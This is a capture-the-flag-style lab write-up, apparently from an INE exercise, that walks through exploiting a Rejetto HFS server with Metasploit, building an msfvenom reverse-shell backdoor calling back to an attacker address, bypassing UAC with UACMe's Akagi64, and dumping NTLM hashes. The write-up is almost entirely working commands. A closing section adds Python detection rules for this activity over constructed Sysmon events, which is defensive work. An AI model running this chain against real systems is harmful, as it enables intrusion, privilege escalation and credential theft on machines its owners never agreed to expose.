UAC Bypass: UACMe
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable server will be accessible at demo.ine.local.
Your task is to fingerprint the application using the tools available on the Kali machine, exploit it using the appropriate Metasploit module, and then bypass UAC using the UACME tool.
Objective: Gain the highest privilege on the compromised machine and obtain the admin user's NTLM hash.
Note: The UACMe tool is located in the "/root/Desktop/tools/UACME/" directory.
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
UACME
Writeup
nmap -sV -sC -O -p- -T4 demo.ine.local
msfconsole
use windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.49.5 LPORT=6969 -f exe > 'backdoor.exe'
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
msfconsole
use exploit/multi/handler
set lhost 10.10.49.5
set lport 6969
set PAYLOAD windows/meterpreter/reverse_tcp
run
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
hashdump
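A defender-side view of the last steps, as an added example that is not part of the original writeup: it flags the process-creation events this procedure leaves behind (the tool run with a numeric method id and a payload path, then a high-integrity process started from the user's Temp directory). The event records are constructed, and the field names (Image, CommandLine, IntegrityLevel) assume Sysmon Event ID 1 output.

```python
import re
from ntpath import basename

# Constructed sample records; field names assume Sysmon Event ID 1 (process creation).
TEMP = r"C:\Users\admin\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"Image": TEMP + r"\Akagi64.exe",
     "CommandLine": "Akagi64.exe 23 " + TEMP + r"\backdoor.exe",
     "IntegrityLevel": "Medium"},
    {"Image": TEMP + r"\backdoor.exe",
     "CommandLine": TEMP + r"\backdoor.exe",
     "IntegrityLevel": "High"},
    {"Image": TEMP + r"\svc.exe",  # constructed: renamed copy, same argument shape
     "CommandLine": "svc.exe 23 " + TEMP + r"\backdoor.exe",
     "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\admin\notes.txt",
     "IntegrityLevel": "Medium"},
    {"Image": TEMP + r"\setup.exe",  # constructed: benign installer, not elevated
     "CommandLine": TEMP + r"\setup.exe /quiet",
     "IntegrityLevel": "Medium"},
]

AKAGI_NAME = re.compile(r"^akagi(32|64)?\.exe$", re.I)
# <program> <numeric method id> <path ending in .exe>, with optional quoting
METHOD_ARGS = re.compile(r'^"?[^"]+?"?\s+\d{1,3}\s+"?[^"]+\.exe"?\s*$', re.I)
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

def classify(event):
    """Return the names of the rules a process-creation event matches."""
    hits = []
    image, cmd = event["Image"], event["CommandLine"]
    if AKAGI_NAME.match(basename(image)):
        hits.append("uacme_binary_name")
    if USER_TEMP.search(image) and METHOD_ARGS.match(cmd):
        hits.append("uacme_argument_shape")
    if USER_TEMP.search(image) and event["IntegrityLevel"] in ("High", "System"):
        hits.append("elevated_process_from_temp")
    return hits

def scan(events):
    """Map each flagged image path to the rules it matched."""
    return {e["Image"]: classify(e) for e in events if classify(e)}

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(rules))
```

The argument-shape rule does not depend on the file name, so it still matches when the binary has been renamed.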